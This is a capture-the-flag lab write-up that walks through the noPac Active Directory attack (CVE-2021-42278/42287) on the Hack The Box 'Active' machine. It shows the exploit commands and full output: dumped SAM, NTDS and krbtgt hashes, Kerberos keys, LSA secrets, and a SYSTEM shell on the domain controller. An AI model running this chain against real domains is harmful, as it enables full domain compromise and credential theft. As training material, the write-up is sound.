InfoSec LAB

Active_noPac

Created: 4 min read

CVE-2021-42278/CVE-2021-42287

The target might be vulnerable to the CVE-2021-42278 +CVE-2021-42287 chain attack given the fact that machine is pretty old.

exploit (nopac)

The CVE-2021-42278 + CVE-2021-42287 chain attack (noPac) works by impersonating a domain controller through faking a computer account with the trailing $ sign

By default, a standard user who is part of an Active Directory domain has the SeMachineAccountPrivilege policy enabled and can add up to 10 devices to the domain

Testing

┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ cme smb $IP -u SVC_TGS -p 'GPPstillStandingStrong2k18' -M nopac   
smb         10.10.10.100    445    dc               [*] windows 6.1 build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
smb         10.10.10.100    445    dc               [+] active.htb\svc_tgs:GPPstillStandingStrong2k18 
NOPAC       10.10.10.100    445    DC               TGT with PAC size 1401
NOPAC       10.10.10.100    445    DC               TGT without PAC size 692
NOPAC       10.10.10.100    445    DC               
NOPAC       10.10.10.100    445    DC               VULNEABLE
nopac       10.10.10.100    445    dc               next step: https://github.com/Ridter/noPac

The target system is confirmed to be vulnerable

Exploitation

┌──(kali㉿kali)-[~/…/htb/labs/active/noPac]
└─$ python3 noPac.py 'active.htb/administrator:Ticketmaster1968' -dc-ip $IP -use-ldap -dump             
 
███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target dc.active.htb
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-W5HSATZXYED$"
[*] MachineAccount "WIN-W5HSATZXYED$" password = sGHqlOYRioCF
[*] Successfully added machine account WIN-W5HSATZXYED$ with password sGHqlOYRioCF.
[*] WIN-W5HSATZXYED$ object = CN=WIN-W5HSATZXYED,CN=Computers,DC=active,DC=htb
[*] WIN-W5HSATZXYED$ sAMAccountName == dc
[*] Saving a DC's ticket in dc.ccache
[*] Reseting the machine account to WIN-W5HSATZXYED$
[*] Restored WIN-W5HSATZXYED$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] 	Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_dc.active.htb.ccache
[*] Attempting to del a computer with the name: WIN-W5HSATZXYED$
[*] Delete computer WIN-W5HSATZXYED$ successfully!
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] Target system bootKey: 0xff954ee81ffb63937b563f523caf1d59
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5c15eb37006fb74c21a5d1e2144b726e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
ACTIVE\DC$:plain_password_hex:a96872372de6af7462f8de5262d671df7f0dc875cd5f9fe2fd405cf042403daff44cd9948be48d00231e24655dad7e2bdcacf73c9f6e849c2c90ad4052738a78eb61684475c3b5d27304c8c48726ae5101e4d355b9e842fabee7e9dd4a2842b429d80ce1d2a4114c7160d25818d4acae3b14a1bf1ee381046b7a10c69a087dbd788b37bf8a35203870e415bbf94512b2a1ed998a65fb7768dd3320237420457c86d15f38d3c9052c418c7ce5294a1babed3b6f9032897118197d7caaa1472f00bbcc3af9f8da22934d504b88b8103f23201aa446e67cfd4178fd9c2ec4bafe22d92c347baa6edb180e10b763c0af2e2d
ACTIVE\DC$:aad3b435b51404eeaad3b435b51404ee:d63a23e428e6428b200c56e45603919c:::
[*] DefaultPassword 
(Unknown User):ROOT#123
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x377bd35be67705f345dabf00d3181e269e0fb1e6
dpapi_userkey:0x7586c391e559565c85cb342d1d24546381f0d5cb
[*] NL$KM 
 0000   CC 6F B8 46 C3 0C 58 05  2F F2 07 2E DA E6 BF 7D   .o.F..X./......}
 0010   60 63 F6 89 E7 0E D5 D5  22 EE 54 DA 63 12 5B B5   `c......".T.c.[.
 0020   D8 DA 0B B7 82 0E 3D E1  9D 7A 03 15 08 5C B0 AE   ......=..z...\..
 0030   EF 63 91 B9 6C 87 65 A8  14 62 95 BC 77 69 77 08   .c..l.e..b..wiw.
NL$KM:cc6fb846c30c58052ff2072edae6bf7d6063f689e70ed5d522ee54da63125bb5d8da0bb7820e3de19d7a0315085cb0aeef6391b96c8765a8146295bc77697708
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5ffb4aaaf9b63dc519eca04aec0e8bed:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b889e0d47d6fe22c8f0463a717f460dc:::
active.htb\SVC_TGS:1103:aad3b435b51404eeaad3b435b51404ee:f54f3a1d3c38140684ff4dad029f25b5:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d63a23e428e6428b200c56e45603919c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:003b207686cfdbee91ff9f5671aa10c5d940137da387173507b7ff00648b40d8
Administrator:aes128-cts-hmac-sha1-96:48347871a9f7c5346c356d76313668fe
Administrator:des-cbc-md5:5891549b31f2c294
krbtgt:aes256-cts-hmac-sha1-96:cd80d318efb2f8752767cd619731b6705cf59df462900fb37310b662c9cf51e9
krbtgt:aes128-cts-hmac-sha1-96:b9a02d7bd319781bc1e0a890f69304c3
krbtgt:des-cbc-md5:9d044f891adf7629
active.htb\SVC_TGS:aes256-cts-hmac-sha1-96:d59943174b17c1a4ced88cc24855ef242ad328201126d296bb66aa9588e19b4a
active.htb\SVC_TGS:aes128-cts-hmac-sha1-96:f03559334c1111d6f792d74a453d6f31
active.htb\SVC_TGS:des-cbc-md5:d6c7eca70862f1d0
DC$:aes256-cts-hmac-sha1-96:e81113c5927d93eb12be8c4db6294a2c3e11fe6fa3835bb549392cfb3f5c2e62
DC$:aes128-cts-hmac-sha1-96:bd891bc22b7b51aa5ee82f7cdf832960
DC$:des-cbc-md5:980810f257a170c4
[*] Cleaning up...

Domain Level Compromise

Shelldrop

┌──(kali㉿kali)-[~/…/htb/labs/active/noPac]
└─$ python3 nopac.py 'active.htb/administrator:Ticketmaster1968' -dc-ip $IP -use-ldap -shell 
 
███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target dc.active.htb
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Already have user Administrator ticket for target dc.active.htb
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
c:\Windows\system32> whoami
nt authority\system
 
c:\Windows\system32> hostname
DC
 
c:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter local area connection:
 
   connection-specific dns suffix  . : 
   ipv6 address. . . . . . . . . . . : dead:beef::91dd:26f0:4484:75bc
   link-local ipv6 address . . . . . : fe80::91dd:26f0:4484:75bc%11
   ipv4 address. . . . . . . . . . . : 10.10.10.100
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%11
                                       10.10.10.2
 
tunnel adapter isatap.{73a3c9b3-56c9-47b6-9326-5c0ffb1a8451}:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . :

GG

Interactive Graph View

Backlinks